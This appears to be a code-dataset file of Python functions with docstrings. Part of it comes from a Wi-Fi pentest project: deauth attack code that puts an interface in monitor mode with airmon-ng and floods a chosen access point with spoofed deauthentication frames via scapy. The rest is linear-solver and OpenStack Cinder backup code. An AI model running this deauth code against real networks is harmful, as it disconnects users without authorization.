def parseResult(self): '\n Parses and beautifully print\n the monitored result\n ' print(('*' * 61)) print('Index'.ljust(4), '|', ' ESSID '.ljust(30), '|', ' BSSID '.ljust(18), '|') print(('*' * 61)) for index in range(len(self.BSSID)): print(str(index).ljust(5), '|', self.ESSID[index].ljust(30), '|', self.BSSID[index].ljust(17), '|') print(('-' * 61)) print('\n') choice_target = (- 1) while ((choice_target > len(self.BSSID)) or (choice_target < 0)): choice_target = int(input('>> Enter the index of the target : ')) return (self.BSSID[choice_target], self.ESSID[choice_target])
def parseResult(self): '\n Parses and beautifully print\n the monitored result\n ' print(('*' * 61)) print('Index'.ljust(4), '|', ' ESSID '.ljust(30), '|', ' BSSID '.ljust(18), '|') print(('*' * 61)) for index in range(len(self.BSSID)): print(str(index).ljust(5), '|', self.ESSID[index].ljust(30), '|', self.BSSID[index].ljust(17), '|') print(('-' * 61)) print('\n') choice_target = (- 1) while ((choice_target > len(self.BSSID)) or (choice_target < 0)): choice_target = int(input('>> Enter the index of the target : ')) return (self.BSSID[choice_target], self.ESSID[choice_target])<|docstring|>Parses and beautifully print the monitored result<|endoftext|>
ef37d51480d4aee78254ce48c5978c894463dc52154b31e2c0b7528505b7d831
def startMon(self): '\n Puts the selected interface in monitor mode\n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')
Puts the selected interface in monitor mode
src/lib/attacks/deauth/deauth_attack.py
startMon
FrancescoPenasa/vault_scanner
230
python
def startMon(self): '\n \n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')
def startMon(self): '\n \n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')<|docstring|>Puts the selected interface in monitor mode<|endoftext|>
4b92703258706dcb425539ec8cfdab12e9505cafd4bdf2b59e077e5820634dba
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]
Collects the name of the new monitor interface
src/lib/attacks/deauth/deauth_attack.py
monInterface
FrancescoPenasa/vault_scanner
230
python
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]<|docstring|>Collects the name of the new monitor interface<|endoftext|>
f65b30511ee7b801ba4add4591720461cc4cd598ebeafe0e72992411a79af913
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))
Start sending deauth packets to the target bssid
src/lib/attacks/deauth/deauth_attack.py
startProcess
FrancescoPenasa/vault_scanner
230
python
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))<|docstring|>Start sending deauth packets to the target bssid<|endoftext|>
c3def569b70547604b014931d92a045131cc7a3fd0a6c14018865dafe6c993e3
def restore(self): '\n Restore the network services\n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')
Restore the network services
src/lib/attacks/deauth/deauth_attack.py
restore
FrancescoPenasa/vault_scanner
230
python
def restore(self): '\n \n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')
def restore(self): '\n \n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')<|docstring|>Restore the network services<|endoftext|>
0b7f5d693219c9c9228d67dfeb2a144d7a7a72ec4cddad0458bf26d69dccb246
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}
Return the properties of the algorithm. It states if it requires symmetric, or positive definite matrices for instance. Args: algo_name: The algorithm name. Returns: The properties of the solver.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
get_default_properties
os-climate/sostrades-core
8
python
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}<|docstring|>Return the properties of the algorithm. It states if it requires symmetric, or positive definite matrices for instance. Args: algo_name: The algorithm name. Returns: The properties of the solver.<|endoftext|>
5cfc239c3d2e63b5550f7bf14070b5413b1d394a40d0ed548ca31851fc407413
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, 
dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)
Return the algorithm options. This method returns the algoritms options after having done some checks, and if necessary, set the default values. Args: solver_type: The KSP solver type. See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_ max_iter: The maximum number of iterations. tol: The relative convergence tolerance, relative decrease in the (possibly preconditioned) residual norm. atol: The absolute convergence tolerance of the (possibly preconditioned) residual norm. dtol: The divergence tolerance, e.g. the amount the (possibly preconditioned) residual norm can increase. preconditioner_type: The type of the precondtioner, see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950 view_config: Whether to call ksp.view() to view the configuration of the solver before run. ksp_pre_processor: A callback function that is called with (KSP problem, options dict) as arguments before calling ksp.solve(). It allows the user to obtain an advanced configuration that is not supported by the current wrapper. If None, do not perform any call. options_cmd: The options to pass to the PETSc KSP solver. If None, use the default options. set_from_options: Whether the options are set from sys.argv, a classical Petsc configuration mode. monitor_residuals: Whether to store the residuals during convergence. WARNING: as said in Petsc documentation, "the routine is slow and should be used only for testing or convergence studies, not for timing." Returns: The algorithm options.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
_get_options
os-climate/sostrades-core
8
python
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, 
dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, 
dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)<|docstring|>Return the algorithm options. This method returns the algoritms options after having done some checks, and if necessary, set the default values. Args: solver_type: The KSP solver type. See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_ max_iter: The maximum number of iterations. tol: The relative convergence tolerance, relative decrease in the (possibly preconditioned) residual norm. atol: The absolute convergence tolerance of the (possibly preconditioned) residual norm. dtol: The divergence tolerance, e.g. the amount the (possibly preconditioned) residual norm can increase. preconditioner_type: The type of the precondtioner, see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950 view_config: Whether to call ksp.view() to view the configuration of the solver before run. ksp_pre_processor: A callback function that is called with (KSP problem, options dict) as arguments before calling ksp.solve(). It allows the user to obtain an advanced configuration that is not supported by the current wrapper. If None, do not perform any call. options_cmd: The options to pass to the PETSc KSP solver. If None, use the default options. set_from_options: Whether the options are set from sys.argv, a classical Petsc configuration mode. monitor_residuals: Whether to store the residuals during convergence. WARNING: as said in Petsc documentation, "the routine is slow and should be used only for testing or convergence studies, not for timing." Returns: The algorithm options.<|endoftext|>
65a6fbe86722803d2770fc2ba5714f94dac8696735810cbb503184114e09142f
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)
Add the normed residual value to the problem residual history. This method is aimed to be passed to petsc4py as a reference. This is the reason why some of its arguments are not used. Args: ksp: The KSP PETSc solver. its: The current iteration. rnorm: The normed residual.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
__monitor
os-climate/sostrades-core
8
python
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)<|docstring|>Add the normed residual value to the problem residual history. This method is aimed to be passed to petsc4py as a reference. This is the reason why some of its arguments are not used. Args: ksp: The KSP PETSc solver. its: The current iteration. rnorm: The normed residual.<|endoftext|>
b447462259225b310e2e5163f8f3679dac4078e3299d6c6e8c58747383aaa41f
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution
Run the algorithm. Args: **options: The algorithm options. Returns: The solution of the problem.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
_run
os-climate/sostrades-core
8
python
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution<|docstring|>Run the algorithm. Args: **options: The algorithm options. Returns: The solution of the problem.<|endoftext|>
73c675da3edc02e35f180e125ff42dc4891c7a870b5992d81b68e29a6d74ae64
@property def driver_name(self): 'This function maps old backup services to backup drivers.' return self._map_service_to_driver(CONF.backup_driver)
This function maps old backup services to backup drivers.
cinder/backup/manager.py
driver_name
inspur-storage/cinder
1
python
@property def driver_name(self): return self._map_service_to_driver(CONF.backup_driver)
@property def driver_name(self): return self._map_service_to_driver(CONF.backup_driver)<|docstring|>This function maps old backup services to backup drivers.<|endoftext|>
9bbd084acf25878e88b428a486a2eb4c269e162d06b77fc561f75e779b5f3c8d
def _map_service_to_driver(self, service): 'Maps services to drivers.' if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service
Maps services to drivers.
cinder/backup/manager.py
_map_service_to_driver
inspur-storage/cinder
1
python
def _map_service_to_driver(self, service): if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service
def _map_service_to_driver(self, service): if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service<|docstring|>Maps services to drivers.<|endoftext|>
d8f872f8bb5b9c85bd8b60bce167deec89bb062c7f27b822a12dc192c83117b2
def init_host(self, **kwargs): 'Run initialization needed for a standalone service.' ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')
Run initialization needed for a standalone service.
cinder/backup/manager.py
init_host
inspur-storage/cinder
1
python
def init_host(self, **kwargs): ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')
def init_host(self, **kwargs): ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')<|docstring|>Run initialization needed for a standalone service.<|endoftext|>
5f06e0d0f87c695962595af82a4cadf26cadc9fea1e6233a171e314a073964e2
def create_backup(self, context, backup): 'Create volume backups using configured backup service.' volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise 
exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')
Create volume backups using configured backup service.
cinder/backup/manager.py
create_backup
inspur-storage/cinder
1
python
def create_backup(self, context, backup): volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create 
backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')
